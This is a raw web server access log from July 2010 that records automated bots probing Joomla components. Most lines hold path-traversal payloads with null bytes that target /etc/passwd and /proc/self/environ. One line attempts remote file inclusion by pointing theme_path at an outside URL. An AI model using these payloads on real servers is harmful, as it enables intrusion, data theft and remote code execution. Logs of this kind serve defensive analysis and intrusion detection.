119.192.145.144 - - [27/Jul/2010:00:52:07 +0200] "GET //index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:52:36 +0200] "GET /logs/access_log//index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:52:36 +0200] "GET //index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:52:37 +0200] "GET /logs//index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:56:12 +0200] "GET /logs/access_log/become_editor.php?theme_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 320 "-" "Mozilla/5.0"
202.47.80.12 - - [27/Jul/2010:00:58:46 +0200] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:58:47 +0200] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:58:51 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:58:53 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:01:07:05 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:01:07:05 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:01:08:05 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:01:08:05 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:01:11:28 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:01:11:29 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:01:11:29 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:01:11:39 +0200] "GET /logs/access_log//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:01:11:44 +0200] "GET /logs/access_log//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:01:11:45 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:01:11:50 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:01:11:50 +0200] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:01:11:55 +0200] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.212.222 - - [27/Jul/2010:01:16:28 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
222.124.212.222 - - [27/Jul/2010:01:20:02 +0200] "GET /logs//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.823"
222.124.212.222 - - [27/Jul/2010:01:20:03 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
222.124.193.12 - - [27/Jul/2010:01:23:37 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:01:23:38 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.212.222 - - [27/Jul/2010:01:23:38 +0200] "GET /logs/access_log//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.823"
222.124.193.12 - - [27/Jul/2010:01:23:38 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.212.222 - - [27/Jul/2010:01:23:39 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
222.124.212.222 - - [27/Jul/2010:01:23:39 +0200] "GET /logs//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.823"
222.124.193.12 - - [27/Jul/2010:01:24:01 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:01:24:02 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:01:24:03 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:24:15 +0200] "GET /logs//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:24:16 +0200] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:24:28 +0200] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:24:28 +0200] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.212.222 - - [27/Jul/2010:01:31:40 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
95.211.71.21 - - [27/Jul/2010:01:31:52 +0200] "GET /index.php?option=com_aardvertiser&cat_name=conf&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:31:58 +0200] "GET /index.php?option=com_aardvertiser&cat_name=conf&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:33:03 +0200] "GET /logs/access_log//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:33:03 +0200] "GET /logs/access_log//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:33:03 +0200] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:33:03 +0200] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:33:03 +0200] "GET /logs//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:33:03 +0200] "GET /logs//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:35:46 +0200] "GET /logs/access_log/index.php?option=com_aardvertiser&cat_name=conf&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:35:47 +0200] "GET /logs/access_log/index.php?option=com_aardvertiser&cat_name=conf&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:35:47 +0200] "GET /index.php?option=com_aardvertiser&cat_name=conf&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:35:47 +0200] "GET /index.php?option=com_aardvertiser&cat_name=conf&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:35:47 +0200] "GET /logs/index.php?option=com_aardvertiser&cat_name=conf&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:35:47 +0200] "GET /logs/index.php?option=com_aardvertiser&cat_name=conf&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
123.125.66.61 - - [27/Jul/2010:01:44:09 +0200] "GET / HTTP/1.1" 200 560 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
64.56.66.178 - - [27/Jul/2010:01:44:17 +0200] "GET / HTTP/1.1" 200 560 "-" "Wget/1.9+cvs-stable (Red Hat modified)"
95.211.71.21 - - [27/Jul/2010:01:44:29 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:01:44:30 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
220.181.7.86 - - [27/Jul/2010:01:45:09 +0200] "GET / HTTP/1.1" 200 560 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
95.141.32.178 - - [27/Jul/2010:01:48:06 +0200] "GET //index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:01:49:32 +0200] "GET /logs/access_log//index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:01:49:33 +0200] "GET //index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:01:49:33 +0200] "GET /logs//index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:01:53:32 +0200] "GET /logs/access_log//index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:01:53:32 +0200] "GET //index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:01:53:33 +0200] "GET /logs//index.php?option=com_diary&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:07:04 +0200] "GET /logs/access_log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 342 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:07:04 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:07:04 +0200] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 331 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:07:20 +0200] "GET /logs/access_log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 342 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:07:20 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:07:20 +0200] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 331 "-" "libwww-perl/5.805"
88.131.106.8 - - [27/Jul/2010:02:28:57 +0200] "GET /robots.txt HTTP/1.0" 404 297 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.2 - - [27/Jul/2010:02:28:58 +0200] "GET /logs/error_log HTTP/1.0" 200 217575 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
69.175.118.101 - - [27/Jul/2010:02:31:36 +0200] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:31:36 +0200] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:31:36 +0200] "GET /logs/access_log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
80.89.233.48 - - [27/Jul/2010:02:35:56 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
80.89.233.48 - - [27/Jul/2010:02:36:31 +0200] "GET /logs/access_log//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
80.89.233.48 - - [27/Jul/2010:02:36:31 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
80.89.233.48 - - [27/Jul/2010:02:36:31 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
69.175.118.101 - - [27/Jul/2010:02:36:35 +0200] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:36:35 +0200] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:36:35 +0200] "GET /logs/access_log/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:37:04 +0200] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:37:05 +0200] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:37:05 +0200] "GET /logs/access_log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:37:25 +0200] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:37:25 +0200] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:37:25 +0200] "GET /logs/access_log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
81.21.78.22 - - [27/Jul/2010:02:37:35 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:37:35 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:37:47 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:37:48 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:37:48 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:37:48 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:38:28 +0200] "GET /logs/access_log//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:38:28 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:38:28 +0200] "GET /logs/access_log//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:38:28 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:38:28 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:02:38:28 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
69.175.118.101 - - [27/Jul/2010:02:40:48 +0200] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:40:48 +0200] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:40:48 +0200] "GET /logs/access_log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
95.141.32.178 - - [27/Jul/2010:02:45:48 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:02:46:32 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:02:46:56 +0200] "GET /logs/access_log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
